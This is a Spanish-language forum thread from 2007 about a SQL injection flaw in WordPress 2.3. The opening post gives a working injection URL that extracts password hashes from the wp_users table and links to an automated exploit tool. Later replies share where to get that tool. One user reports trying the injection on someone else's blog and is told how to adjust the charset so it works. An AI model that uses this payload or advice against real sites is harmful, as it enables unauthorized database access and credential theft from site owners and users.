Título: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: WHK en 16 Diciembre 2007, 05:44 am Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores.
Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL. Ejemplo: http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users%23 Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos: http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/ Fuentes: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/ http://seclists.org/bugtraq/2007/Dec/0127.html http://trac.wordpress.org/ticket/2394 http://seclists.org/bugtraq/2007/Nov/0274.html http://h4ck1ng.net/index.php/topic,1036.0.html http://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/ También está el pwnpress que hace todo el trabajo sucio automaticamente :P (http://www.genbeta.com/images/2007/09/pwnpress.jpg) http://www.info-pull.com/code.dynp Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: hackpsycho en 16 Diciembre 2007, 21:49 pm donde puedo descargar ese soft amigo?
Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: -sagitari- en 23 Diciembre 2007, 13:38 pm donde puedo descargar ese soft amigo? No click&hack link re-"movido" (http://www.info-pull.com/code/pwnpress.rb) Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: gasp en 27 Diciembre 2007, 05:28 am alguien sabe como puedo compilarlo ? en cke lo puedo compilar para cke salga en modo graffico como aparece en la imagen ?
consegui el code, pero esta en ruby ya lo compile pero nadamas no ckiere... Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: WHK en 27 Diciembre 2007, 07:35 am Necesitas una librería para poder ejecutarlo la cual no me acuerdo cual era, por eso me aburrí y lo borré :P
Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: gasp en 27 Diciembre 2007, 09:06 am saludos, oie seria bueno cke recordaras esa libreria y asi poder buscarla, y poder compilar al cien ese exploit o programa espero respuesta
Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: aninhill en 30 Diciembre 2007, 04:09 am Lo probe en un blog de wordpress. No se que version es pero me responde esto:
Código: WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like'] Título: Re: SQL inyeccion en todas las versiones de wordpress menos la ultima :p Publicado por: sirdarckcat en 30 Diciembre 2007, 08:29 am tienes que hacer la inyeccion manualmente y cambiar el charset a latin.
Saludos!! |